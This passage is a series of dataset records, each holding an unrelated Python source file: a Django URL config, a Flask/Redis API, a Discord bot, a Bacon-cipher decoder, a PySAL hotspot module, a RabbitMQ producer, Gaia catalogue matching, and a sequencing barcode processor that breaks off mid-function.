{"seq_id":"58127509","text":"\"\"\"api URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework import routers, permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nfrom provider.api.viewsets import ProviderViewSet, ProviderServiceAreaViewSet\nfrom provider.api.api_get_rides import RidesAPIView\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Mozio API\",\n default_version='v1',\n description=\"mozio ride matching API\",\n terms_of_service=\"\",\n contact=openapi.Contact(email=\"contact@snippets.local\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nrouter = routers.DefaultRouter()\nrouter.register(r'providers', ProviderViewSet)\nrouter.register(r'provider-service-areas', ProviderServiceAreaViewSet)\n\nurlpatterns = [\n # path(r'swagger(?P\\.json|\\.yaml)', schema_view.without_ui(cache_timeout=0), name='schema-json'),\n path(r'swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n path(r'redoc/', schema_view.with_ui('redoc', cache_timeout=0), name='schema-redoc'),\n path('api/', include(router.urls)),\n path('api/rides/', RidesAPIView.as_view()),\n path('admin/', admin.site.urls),\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"618053381","text":"\"\"\"Cache-related helpers.\"\"\"\nimport functools\nimport hashlib\nimport inspect\nimport pathlib\n\nimport joblib\n\nimport pytoolkit as tk\n\n\ndef memorize(cache_dir, compress=0, verbose=True):\n \"\"\"Decorator that caches a function's return value to a file.\n\n Calling it with force_rerun=True forces re-execution and overwrites the cache.\n\n \"\"\"\n\n def decorator(func):\n @functools.wraps(func)\n def memorized_func(*args, force_rerun=False, **kwargs):\n cache_path = get_cache_path(cache_dir, func, args, kwargs, verbose)\n # read from the cache if it exists\n if not force_rerun:\n if cache_path.is_file():\n if verbose:\n tk.log.get(__name__).info(f\"Cache is found: {cache_path}\")\n return joblib.load(cache_path)\n else:\n if verbose:\n tk.log.get(__name__).info(f\"Cache is not found: {cache_path}\")\n # otherwise run the actual computation\n result = func(*args, **kwargs)\n if tk.hvd.is_master():\n cache_path.parent.mkdir(parents=True, exist_ok=True)\n joblib.dump(result, cache_path, compress=compress)\n tk.hvd.barrier()\n if not tk.hvd.is_master():\n result = joblib.load(cache_path)\n tk.hvd.barrier()\n return result\n\n return memorized_func\n\n return decorator\n\n\ndef get_cache_path(cache_dir, func, args, kwargs, verbose):\n \"\"\"Build and return the cache file path.\"\"\"\n cache_dir = pathlib.Path(cache_dir)\n bound_args = inspect.signature(func).bind(*args, **kwargs).arguments\n args_list = sorted(dict(bound_args).items())\n args_str = \",\".join([f\"{repr(k)}:{repr(v)}\" for k, v in args_list])\n args_hash = hashlib.md5(args_str.encode(\"utf-8\")).hexdigest()[:8]\n if verbose:\n tk.log.get(__name__).info(f\"Cache {args_hash}: arguments={args_str}\")\n cache_path = cache_dir / f\"{func.__name__}_{args_hash}.pkl\"\n return cache_path\n","sub_path":"pytoolkit/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"45298442","text":"import json\nimport redis\nimport datetime\nimport os\nfrom flask import Flask, request\n\napp = Flask(__name__)\n\nredis_ip = os.environ.get('REDIS_IP')\nif not redis_ip:\n raise Exception()\nrd=redis.StrictRedis(host=redis_ip, port=6379, db=0)\n\n@app.route('/animals', methods=['GET'])\ndef get_animals():\n animal_list = \"\"\n for i in range(rd.dbsize()):\n key=\"key\"+str(i+1)\n animal_list = animal_list+str(rd.hgetall(key))\n return animal_list+\"\\n\"\n\n@app.route('/animals/count', methods=['GET'])\ndef count_animals():\n return str(rd.dbsize())+\"\\n\"\n\n@app.route('/animals/dates', methods=['GET'])\ndef select_dates():\n date1 = request.args.get('d1')\n date2 = request.args.get('d2')\n date1 = datetime.datetime.strptime(date1, \"%Y-%m-%d\")\n date2 = datetime.datetime.strptime(date2, \"%Y-%m-%d\")\n within_range = \"\"\n for i in range(rd.dbsize()):\n key=\"key\"+str(i+1)\n date_created = str(rd.hmget(key, 'created_on'))\n date_created = date_created.replace('[', '')\n date_created = date_created.replace(\"'\", '')\n date_created = date_created.replace(']', '')\n date_created = datetime.datetime.strptime(date_created, \"%Y-%m-%d\")\n if date1 <= date_created and date_created <= date2:\n within_range = within_range+str(rd.hgetall(key))\n if i == 19:\n return \"All animals created within the queried date range: \"+within_range+\"\\n\"\n\n@app.route('/animals/dates/remove', methods=['GET'])\ndef remove_animals_by_date():\n date1 = request.args.get('d1')\n date2 = request.args.get('d2')\n date1 = datetime.datetime.strptime(date1, \"%Y-%m-%d\")\n date2 = datetime.datetime.strptime(date2, \"%Y-%m-%d\")\n within_range = \"\"\n for i in range(rd.dbsize()):\n key=\"key\"+str(i+1)\n date_created = str(rd.hmget(key, 'created_on'))\n date_created = date_created.replace('[', '')\n date_created = date_created.replace(\"'\", '')\n date_created = date_created.replace(']', '')\n date_created = datetime.datetime.strptime(date_created, \"%Y-%m-%d\")\n if date1 <= date_created and date_created <= date2:\n rd.delete(key)\n if i == 19:\n return within_range+\"\\n\"\n\n@app.route('/animals/average_legs', methods=['GET'])\ndef average_legs():\n total_legs = 0.0\n if rd.dbsize() == 0:\n return \"There are no animals!\\n\"\n for i in range(rd.dbsize()):\n key=\"key\"+str(i+1)\n legs = str(rd.hmget(key, 'legs'))\n legs = legs.replace('[', '')\n legs = legs.replace(\"'\", '')\n legs = legs.replace(']', '')\n total_legs = total_legs + float(legs)\n return str(total_legs/rd.dbsize())+\"\\n\"\n\n@app.route('/reset', methods=['GET'])\ndef populate_redis():\n animals = getdata()\n for i in range(len(animals['animals'])):\n key=\"key\"+str(i+1)\n rd.delete(key)\n 
rd.hmset(key,animals['animals'][(i)])\n key = \"\"\n rd.delete('animals')\n return key+\"\\n\"\n\n@app.route('/animals/select/', methods=['GET'])\ndef select(UUID):\n UUID = \"['\"+str(UUID)+\"']\"\n for i in range(rd.dbsize()):\n key = \"key\"+str(i+1)\n uid = str(rd.hmget(key, 'uid'))\n if uid == UUID:\n return str(rd.hgetall(key))+\"\\n\"\n \n@app.route('/animals/edit///', methods=['GET'])\ndef edit_animal(UUID, bodypart, new):\n UUID = \"['\"+str(UUID)+\"']\"\n for i in range(rd.dbsize()):\n key = \"key\"+str(i+1)\n uid = str(rd.hmget(key, 'uid'))\n if uid == UUID:\n bodypart = str(bodypart)\n rd.hset(key, bodypart, new)\n return \"Edited Animal: \"+str(rd.hgetall(key))+\"\\n\"\n\n@app.route('/print', methods=['GET'])\ndef print_redis_data():\n return str(rd.keys())+\"\\n\"\n \ndef getdata():\n with open(\"animals.json\", \"r\") as json_file:\n userdata = json.load(json_file)\n return userdata\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","sub_path":"homework06/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"565546276","text":"import discord #Use Discord.py API\r\nfrom discord.ext import commands #Import the commands\r\nfrom discord.ext.commands import Bot\r\nfrom discord import Game\r\nimport asyncio\r\nfrom itertools import cycle\r\nimport os\r\nimport json\r\n\r\n\r\nasync def get_prefix(bot, message):\r\n\r\n if not message.guild:\r\n return commands.when_mentioned_or(\"!!\")(bot, message)\r\n\r\n\r\n with open(\"prefixes.json\", \"r\") as f:\r\n prefixes = json.load(f)\r\n\r\n\r\n prefixes[str(message.guild.id)] = \"!!\"\r\n guildowner = message.guild.owner\r\n\r\n\r\n await bot.wait_until_ready()\r\n\r\n\r\n if str(message.guild.id) not in prefixes: \r\n\r\n guildowner.send(\"Thanks for inviting LAB! Before you can get started with the bot, please run !!prefix YOURPREFIX first.\")\r\n\r\n with open(\"prefixes.json\", \"w\") as f:\r\n json.dump(prefixes, f)\r\n\r\n return commands.when_mentioned_or(\"!!\")(bot, message)\r\n\r\n prefix = prefixes[str(message.guild.id)]\r\n return commands.when_mentioned_or(prefix)(bot, message)\r\n\r\n\r\nTOKEN = open(\"TOKEN.txt\", \"r\").read() #Gets Bot Token\r\nbot = commands.Bot(command_prefix = get_prefix) #Set prefix\r\nbot.remove_command(\"help\")\r\n\r\n\r\n@bot.event\r\nasync def on_guild_join(guild):\r\n owner = guild.owner\r\n\r\n joinembed=discord.Embed(title=\"Welcome!\", color=0x0000ff)\r\n joinembed.add_field(name=\"Getting Started\", value=\"To get the bot running use this command: \", inline=False)\r\n joinembed.add_field(name=\"Command\", value=\"!!prefix !! or !!prefix YOURPREFIX\", inline=False)\r\n\r\n await owner.send(embed=joinembed)\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print(\"Bot is initialized. 
Version 0.0.4 lock and loaded.\")\r\n servers = len(bot.guilds)\r\n print(\"Active on \" + str(servers) + \" server\")\r\n\r\n\r\ndef __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n\r\n self.setbotgame = self.loop.create_task(self.change_status)\r\n\r\n@bot.event\r\nasync def on_message(message):\r\n author = message.author\r\n content = message.content\r\n print(\"{}: {}\".format(author, content))\r\n await bot.process_commands(message) #Continues searching for commands after executing this event.\r\n\r\n@bot.event\r\nasync def on_join(ctx):\r\n owner = ctx.guild.owner.id\r\n\r\n infoembed=discord.Embed(title=\"Starting Information\", color=0x00FF00)\r\n infoembed.add_field(name=\"Getting Started\", value=\"To get the bot running use this command: \", inline=False)\r\n infoembed.add_field(name=\"Command\", value=\"!!prefix YOURPREFIX\", inline=False)\r\n\r\n await owner.send(embed=infoembed)\r\n\r\n@bot.command()\r\nasync def ping(ctx):\r\n await ctx.send(\"Pong! {0}\".format(round(bot.latency, 1)))\r\n\r\n@bot.command()\r\nasync def spaceforme(ctx, *, args): # * means multiple words given\r\n output = ''\r\n for word in args:\r\n output += word\r\n output += ' '\r\n await ctx.send(output)\r\n\r\n\r\n@bot.command()\r\nasync def say(ctx, *, args): # * means multiple words given\r\n output = ''\r\n for word in args:\r\n output += word\r\n await ctx.send(output)\r\n\r\n@bot.event\r\nasync def on_message_delete(message):\r\n author = message.author\r\n content = message.content\r\n print(\"{}: {}\".format(author, content) + \" got deleted\") #Send a message to the server defined in variable\r\n await bot.process_commands(message)\r\n\r\n\r\nfor cog in os.listdir(\".\\\\cogs\"):\r\n if cog.endswith(\".py\") and not cog.startswith(\"_\"):\r\n try:\r\n cog = f\"cogs.{cog.replace('.py', '')}\"\r\n bot.load_extension(cog)\r\n except Exception as e:\r\n print(f\"{cog} can not be loaded:\")\r\n raise e\r\n\r\nasync def chng_pr():\r\n await bot.wait_until_ready()\r\n servers = len(bot.guilds)\r\n\r\n while not bot.is_closed():\r\n\r\n await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=str(servers) + \" server\"))\r\n\r\n await asyncio.sleep(30)\r\n\r\n await bot.change_presence(activity=discord.Game(name=\"V0.0.4\"))\r\n\r\n await asyncio.sleep(30)\r\n\r\n\r\nasync def on_command_error(self, ctx, error):\r\n if isinstance(error, commands.CheckFailure):\r\n await ctx.send(\"You don't have the permission to do that!\")\r\n if isinstance(error, commands.CommandNotFound):\r\n await ctx.send(\"This command is not existing\")\r\n\r\n\r\n raise error\r\n\r\n\r\n\r\n\r\nbot.loop.create_task(chng_pr())\r\nbot.run(TOKEN)\r\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"187719723","text":"import zipfile\nwith zipfile.ZipFile('main.zip','r') as zip_ref:\n zip_ref.extractall('given files')\n\nimport os\nw=list()\nfor root, dirs, files in os.walk(\"given files\"):\n for file in files:\n if file.endswith(\".py\"):\n p=os.path.join(root)\n p=p[::-1]\n for i in range(len(p)):\n if p[i]=='/':\n p=p[:i]\n p=p[::-1]\n break\n w.append(p)\nw.sort()\nfor i in range(1,len(w)):\n if w[i]!=w[i-1]:\n print(w[i-1])\nprint(w[i])\n#a=list()\n#for name in w:\n# 
a.append(name[-2])\n#print(a)\n","sub_path":"w3/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"113706405","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.15-x86_64/egg/flask_limiter/errors.py\n# Compiled at: 2019-10-02 22:11:48\n# Size of source mod 2**32: 1214 bytes\n\"\"\"\nerrors and exceptions\n\"\"\"\nfrom distutils.version import LooseVersion\nfrom pkg_resources import get_distribution\nfrom six import text_type\nfrom werkzeug import exceptions\nwerkzeug_exception = None\nwerkzeug_version = get_distribution('werkzeug').version\nif LooseVersion(werkzeug_version) < LooseVersion('0.9'):\n import werkzeug._internal\n werkzeug._internal.HTTP_STATUS_CODES[429] = 'Too Many Requests'\n werkzeug_exception = exceptions.HTTPException\nelse:\n werkzeug_exception = exceptions.TooManyRequests\n\nclass RateLimitExceeded(werkzeug_exception):\n __doc__ = '\\n exception raised when a rate limit is hit.\\n The exception results in ``abort(429)`` being called.\\n '\n code = 429\n limit = None\n\n def __init__(self, limit):\n self.limit = limit\n if limit.error_message:\n description = limit.error_message if not callable(limit.error_message) else limit.error_message()\n else:\n description = text_type(limit.limit)\n super(RateLimitExceeded, self).__init__(description=description)","sub_path":"pycfiles/Flask_Limiter-1.2.1-py3.8/errors.cpython-38.py","file_name":"errors.cpython-38.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"83108241","text":"\n\n#calss header\nclass _DONOR():\n\tdef __init__(self,): \n\t\tself.name = \"DONOR\"\n\t\tself.definitions = [u'a person who gives some of their blood or a part of their body to help someone who is ill: ', u'a person who gives money or goods to an organization: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_donor.py","file_name":"_donor.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"428252529","text":"'''\n解培根密码\n'''\ndef bacon_decode(s):\n bs = \"\"\n bacon_table1 = 'abcdefghijklmnopqrstuvwxyz??????'\n bacon_table2 = 'abcdefghiklmnopqrstuwxyz????????'\n\n for x in s:\n if 'A' <= x <= 'Z':\n bs += '1'\n elif 'a' <= x <= 'z':\n bs += '0'\n\n bacon_m = [\"\", \"\", \"\", \"\"]\n bs += '0' * (5 - len(bs) % 5)\n for i in range(0, len(bs), 5):\n p = int(bs[i: i + 5], 2)\n bacon_m[0] += bacon_table1[p]\n bacon_m[1] += bacon_table2[p]\n bacon_m[2] += bacon_table1[31 - p]\n bacon_m[3] += bacon_table2[31 - p]\n return bacon_m\n\ns = r\"...\"\nprint(\"\\n\\n\".join(bacon_decode(s)).replace('x', ' '))\nprint(\"\\n\\n\")\n","sub_path":"Python/CTF/bacon.py","file_name":"bacon.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"172996680","text":"\"\"\"\nGetis-Ord's G geostatistics (hotspot/coldspot analysis)\n\"\"\"\n\nimport pysal as ps\nfrom collections import OrderedDict\n\n# crankshaft modules\nimport 
crankshaft.pysal_utils as pu\nfrom crankshaft.analysis_data_provider import AnalysisDataProvider\n\n# High level interface ---------------------------------------\n\n\nclass Getis:\n def __init__(self, data_provider=None):\n if data_provider is None:\n self.data_provider = AnalysisDataProvider()\n else:\n self.data_provider = data_provider\n\n def getis_ord(self, subquery, attr,\n w_type, num_ngbrs, permutations, geom_col, id_col):\n \"\"\"\n Getis-Ord's G*\n Implementation building neighbors with a PostGIS database and PySAL's\n Getis-Ord's G* hotspot/coldspot module.\n Andy Eschbacher\n \"\"\"\n\n # geometries with attributes that are null are ignored\n # resulting in a collection of not as near neighbors if kNN is chosen\n\n qvals = OrderedDict([(\"id_col\", id_col),\n (\"attr1\", attr),\n (\"geom_col\", geom_col),\n (\"subquery\", subquery),\n (\"num_ngbrs\", num_ngbrs)])\n\n result = self.data_provider.get_getis(w_type, qvals)\n attr_vals = pu.get_attributes(result)\n\n # build PySAL weight object\n weight = pu.get_weight(result, w_type, num_ngbrs)\n\n # calculate Getis-Ord's G* z- and p-values\n getis = ps.esda.getisord.G_Local(attr_vals, weight,\n star=True, permutations=permutations)\n\n return zip(getis.z_sim, getis.p_sim, getis.p_z_sim, weight.id_order)\n","sub_path":"release/python/0.6.1/crankshaft/crankshaft/clustering/getis.py","file_name":"getis.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"419146306","text":"'''\n@Author: sauron\n@Date: 2019-10-29 15:33:55\n@LastEditTime : 2020-01-07 11:59:29\n@LastEditors : Sauron Wu\n@Description: In User Settings Edit\n@FilePath: /pynq_car/Host-Part/dnndk-host/graph_input_fn.py\n'''\nimport cv2\n#from PIL import Image\nimport os\nimport numpy as np\nimport glob\nCONV_INPUT = \"conv2d_1_input\"\ncalib_batch_size = 50\ndef calib_input(iter):\n training_data = glob.glob(\"../training_data_npz/*.npz\")\n images = []\n with np.load(training_data[iter%len(training_data)]) as data:\n img_num_in_npz = len(data['train_imgs'])\n for index in range(0, calib_batch_size):\n images.append(data['train_imgs'][index%img_num_in_npz])\n return {CONV_INPUT: images}\n\n","sub_path":"Host-Part/dnndk-host/graph_input_fn.py","file_name":"graph_input_fn.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"521876394","text":"class Solution:\n \"\"\"\n @param arr: the positions\n @return: minimum number of moves\n \"\"\"\n def movingStones(self, arr):\n # Write your code here\n arr.sort()\n res1 = res2 = 0\n for i in range(len(arr)):\n res1 += abs(arr[i] - i * 2 - 1)\n res2 += abs(arr[i] - i * 2 - 2)\n return min(res1, res2)\n","sub_path":"Contest 53 Weekly #33/1585. 
移动石子/li.py","file_name":"li.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"602811119","text":"from kombu import Connection, Exchange, Queue, Producer, Consumer\n\nglobal cam_light\ncam_light = 'Red'\n\ndef process_camera(body, message):\n global cam_light\n print('cam message received')\n if body == 'OK':\n cam_light = 'Green'\n print('{}-{}'.format(cam_light,body))\n else:\n cam_light = 'Yellow'\n print('{}-{}'.format(cam_light,body))\n message.ack()\n\nrabbit_url = 'amqp://localhost:5672/'\ncam_exchange_name = 'camera_exchange'\ncam_queue_name = 'camera_queue'\nqueue_key = 'CAMERA'\n\nthisConnection = Connection(rabbit_url)\nthisChannel = thisConnection.channel()\ncamExchange = Exchange(cam_exchange_name, type='direct')\n\ncamQueue = Queue(name=cam_queue_name, exchange=camExchange, routing_key=queue_key, max_length=5)\ncamQueue.maybe_bind(thisConnection)\ncamQueue.declare()\n\ncamProducer = Producer(channel=thisChannel, exchange=camExchange, routing_key=queue_key)\ncamProducer.publish('OK')\n\ncamConsumer = Consumer(thisConnection, queues=camQueue, callbacks=[process_camera], accept=['text/plain'])\ncamConsumer.consume()\nprint('{}'.format(cam_light))\n","sub_path":"camproducer.py","file_name":"camproducer.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"340217805","text":"import numpy as np\nimport os\n\n################## query based on ICRS coordinates 2 arcsec search radius\n\nos.system('cp rebull_raw_ICRS.reg rebull_ICRS_Gaia.reg') # template region file to show Gaia results\n\nrebull_raw_ICRS_Gaia = np.loadtxt('rebull_raw_ICRS_Gaia.txt',dtype='string')\nrows, cols = rebull_raw_ICRS_Gaia.shape\ndistdic = {}\nfor rr in range(rows):\n kk = str(rebull_raw_ICRS_Gaia[rr,0])\n dd = int(float(rebull_raw_ICRS_Gaia[rr,5]))\n distdic[kk] = str(dd)\n\nrebull_ICRS_Gaia = open('rebull_ICRS_Gaia.reg', 'r')\nnewregfile = open('ds9.reg','w') \nreglines = rebull_ICRS_Gaia.readlines()\nreghead = reglines[:3]\nregdata = reglines[3:]\nfor ll in reghead:\n newregfile.write(ll)\nfor lll in regdata:\n if lll[6:28] in distdic.keys():\n lll_1 = lll.split('{')[0]\n newregfile.write(lll_1+'{'+distdic[lll[6:28]]+'}\\n')\n\nrebull_ICRS_Gaia.close() \nnewregfile.close()\nos.system('cp ds9.reg rebull_ICRS_Gaia.reg')\n\n################## query based on 2MASS name\n\nos.system('cp rebull_raw_2MASS.reg rebull_2MASS_Gaia.reg') # template region file to show Gaia results\n\nrebull_2MASS_Gaia = np.loadtxt('rebull_2MASS_Gaia.txt',dtype='string')\nrows, cols = rebull_2MASS_Gaia.shape\ndistdic = {}\nfor rr in range(rows):\n kk = str(rebull_2MASS_Gaia[rr,1]) # Jxxxxxxxx+xxxxxxx\n dd = int(float(rebull_2MASS_Gaia[rr,6])) # rest distance in pc\n distdic[kk] = str(dd)\n\nrebull_2MASS_Gaia = open('rebull_2MASS_Gaia.reg', 'r')\nnewregfile = open('ds9.reg','w') \nreglines = rebull_2MASS_Gaia.readlines()\nreghead = reglines[:3]\nregdata = reglines[3:]\nfor ll in reghead:\n newregfile.write(ll)\nfor lll in regdata:\n if lll[-19:-2] in distdic.keys(): # Jxxxxxxxx+xxxxxxx\n lll_1 = lll.split('{')[0]\n newregfile.write(lll_1+'{'+distdic[lll[-19:-2]]+'}\\n')\n\nrebull_2MASS_Gaia.close() \nnewregfile.close()\nos.system('cp ds9.reg 
rebull_2MASS_Gaia.reg')\n","sub_path":"matchGaia.py","file_name":"matchGaia.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"400053593","text":"\"\"\"\nCreated on Tue Aug 23 18:12:22 2019\n\n@author: cyrille\n\"\"\"\n\nimport numpy as np\nimport os\nimport subprocess\nimport shlex\nimport gzip\nimport matplotlib.pyplot as plt\n\nimport Levenshtein\nfrom scipy.signal import savgol_filter\nfrom scipy.signal import find_peaks\n\ndef hamming(s1, s2):\n str_len = np.argsort([len(s1), len(s2)])\n s1, s2 = np.array([s1, s2])[str_len]\n s1 = s1+(len(s2)-len(s1))*'N'\n return sum(ch1 != ch2 for ch1, ch2 in zip(s1, s2))\n\ndef rev_comp(seq):\n \"\"\"reverse complement a string\"\"\"\n relation = {'A':'T', 'T':'A', 'C':'G', 'G':'C', 'N':'N'}\n return ''.join(relation[s] for s in seq[::-1])\n\ndef find_chars(string, ch):\n \"\"\"finds all the occurences of character in string and\n returns an array with the start and end indices\n of consecutive character occurences.\n \n find_chars('aNacagNNNtt', 'N') retruns array([[1, 2], [6, 9]])\n \n useful to specify barcode structures as string\"\"\"\n locs = [i for i, ltr in enumerate(string) if ltr == ch]\n gaps = [[s, e] for s, e in zip(locs, locs[1:]) if s+1 < e]\n edges = iter(locs[:1] + sum(gaps, []) + locs[-1:])\n return np.array([(s, e+1) for s, e in zip(edges, edges)]).astype(int)\n\ndef from_fastq(handle):\n \"\"\"Generater to yield four fastq lines at a time\"\"\" \n while True:\n name = next(handle).rstrip()[1:]\n seq = next(handle).rstrip()\n next(handle)\n qual = next(handle).rstrip()\n if not name:\n break\n yield name, seq, qual\n\nclass seq_experiment(object):\n \"\"\"Class contains methods to evaluate a paired end read of an amplicon panel\n single cell sequencing experiment like tapestri\"\"\"\n \n def __init__(self, bc_list, bcerror_tolerance):\n self.R1_files = []\n self.R2_files = []\n self.bc1_l = bc_list[0]\n self.bc2_l = bc_list[1]\n self.bc3_l = bc_list[2]\n self.bcerror_tolerance = bcerror_tolerance\n self.perror_tolerance = 0\n self.bc3_correction_dic = {}\n self.bc2_correction_dic = {}\n self.bc1_correction_dic = {}\n self.bc_groups = {}\n self.read_to_bc = {}\n self.cell_barcodes = None # barcode list that were determeined to be associated with true cells\n\n class _read(object):\n \"\"\"Just a container to keep some data together\"\"\"\n \n def __init__(self, idx1, idx2, seq1, seq2, qual1, qual2):\n \"\"\"init function to set up the data structure\"\"\"\n self.idx1 = idx1\n self.idx2 = idx2\n self.seq1 = seq1\n self.seq2 = seq2\n self.qual1 = qual1\n self.qual2 = qual2\n \n def process_barcodes(self, R1_file, R2_file, handle, verbose=True, cleanup=True, \n rev_complement_s2 = False, ligation_scar ='CCTAGTACTCGCAGTAGTC'):\n \"\"\"function to extract barcodes from R1 file and correct for sequencing/PCR errors against white list. 
Invokes the \n program Cutadapt from the commandline\"\"\"\n self.R1_files.append(R1_file)\n self.R2_files.append(R2_file)\n # naive approach to log some read statistics\n failed_barcodes_ambigous = 0\n failed_barcodes_error_thresh = 0\n good_reads = 0\n total_processed = 0\n corrected_reads = 0\n \n # use of the external cutadapt program to efficiently search for common \n # handle sequences if cleanup is set to 'True' files will get deleted after use\n _name = R1_file.split('.fastq.')[1]\n cutadapt_command = 'cutadapt -g {} -A {} -o {} -p {} {} {} -q 20 -e 0.075 -O 9 -j 3 --discard-untrimmed'.format(ligation_scar, ligation_scar, _name+'_read.fastq.gz', _name+'_bc.fastq.gz', R1_file, R1_file)\n subprocess.call(shlex.split(cutadapt_command), stdout=subprocess.PIPE)\n \n bc_pos = find_chars(handle, 'N') - len(handle)\n \n self._temp_read = {}\n with gzip.open(_name+'_bc.fastq.gz', 'rt') as f0, gzip.open(_name+'_read.fastq.gz', 'rt') as f1:\n for ((id0, seq_bc, qual_bc), (ID, seq, qual1)) in zip(from_fastq(f0), from_fastq(f1)):\n assert id0.split(' ')[0] == ID.split(' ')[0]\n ID1 = ID.split(' ')[0]\n total_processed += 1\n BC1, BC2, BC3 = seq_bc[bc_pos[0,0]:bc_pos[0,1]], seq_bc[bc_pos[1,0]:bc_pos[1,1]], seq_bc[bc_pos[2,0]:]\n \n bc1, d1, a1, self.bc1_correction_dic = self.barcode_matcher(BC1, self.bc1_l, self.bc1_correction_dic)\n bc2, d2, a2, self.bc2_correction_dic = self.barcode_matcher(BC2, self.bc2_l, self.bc2_correction_dic)\n bc3, d3, a3, self.bc3_correction_dic = self.barcode_matcher(BC3, self.bc3_l, self.bc3_correction_dic)\n \n if a1 + a2 + a3 > 3:\n failed_barcodes_ambigous += 1\n continue\n if d1 > self.bcerror_tolerance or d2 > self.bcerror_tolerance or d3 > self.bcerror_tolerance:\n failed_barcodes_error_thresh += 1\n continue\n\n elif d1+d2+d3 >= 0:\n if d1+d2+d3 == 0:\n good_reads += 1\n else:\n corrected_reads += 1\n self._temp_read[ID1]={'bc':bc1+bc2+bc3, 'seq':seq, 'qual':qual1, 'id':ID}\n \n \n with gzip.open(R2_file, 'rt') as f2:\n for (id2, seq2, qual2) in from_fastq(f2):\n ID2 = id2.split(' ')[0]\n try:\n bc, seq1, qual1, id1 = self._temp_read[ID2]['bc'], self._temp_read[ID2]['seq'], self._temp_read[ID2]['qual'], self._temp_read[ID2]['id']\n except KeyError:\n continue\n if rev_complement_s2:\n read = self._read(id1, id2, seq1, rev_comp(seq2), qual1, qual2[::-1])\n else:\n read = self._read(id1, id2, seq1, seq2, qual1, qual2)\n try:\n self.bc_groups[bc][ID2] = read\n self.read_to_bc[ID2] = bc1+bc2+bc3\n except KeyError:\n self.bc_groups[bc] = {ID2 : read}\n self.read_to_bc[ID2] = bc1+bc2+bc3\n \n if verbose:\n print('total reads processed: {}'.format(total_processed))\n print('reads with ambigous barcodes: {}'.format(failed_barcodes_ambigous))\n print('reads failed barcode error threshold: {}'.format(failed_barcodes_error_thresh))\n print('total flawless reads: {}'.format(good_reads))\n print('total corrected reads: {}'.format(corrected_reads))\n \n if cleanup:\n os.remove(_name+'_read.fastq.gz')\n os.remove(_name+'_bc.fastq.gz')\n #os.remove(R2_file.split('.fastq.')[1]+'_r2.fastq.gz')\n \n @staticmethod\n def barcode_matcher(bc, bc_list, bc_correction_dic):\n \"\"\" \n matches barcodes to the white list of allowed barcodes\n output dictionary of perfect matches and a second dictionary of barcodes\n with a smaller Levenshtein distance than set in dissimilarity_tolerance.\n \"\"\"\n if bc in bc_list:\n diss = 0\n ambig = 1\n else:\n try:\n bc_new, diss, dissH, ambig = bc_correction_dic[bc]\n except KeyError:\n dissimilarity = np.ones(len(bc_list))\n dissimilarityH = np.ones(len(bc_list))\n for i, bc1 in 
